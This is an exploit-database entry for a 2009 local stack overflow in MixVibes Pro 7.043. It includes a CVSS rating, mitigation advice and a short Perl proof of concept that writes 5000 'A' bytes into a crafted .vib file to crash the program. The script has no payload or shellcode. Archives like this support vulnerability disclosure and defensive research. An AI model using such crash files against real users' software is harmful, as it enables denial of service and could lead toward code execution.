header-logo
Suggest Exploit
vendor:
MixVibes Pro
by:
HACK4LOVE
7.5
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: MixVibes Pro
Affected Version From: MixVibes Pro 7.043
Affected Version To: MixVibes Pro 7.043
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC

The MixVibes Pro software version 7.043 is vulnerable to a local stack overflow exploit. By creating a specially crafted .vib file, an attacker can trigger a stack overflow and potentially execute arbitrary code on the affected system.

Mitigation:

Update to a patched version of the software. Avoid opening .vib files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC
# http://www.softpedia.com/progDownload/MixVibes-Pro-Download-3074.html
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.vib');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-14]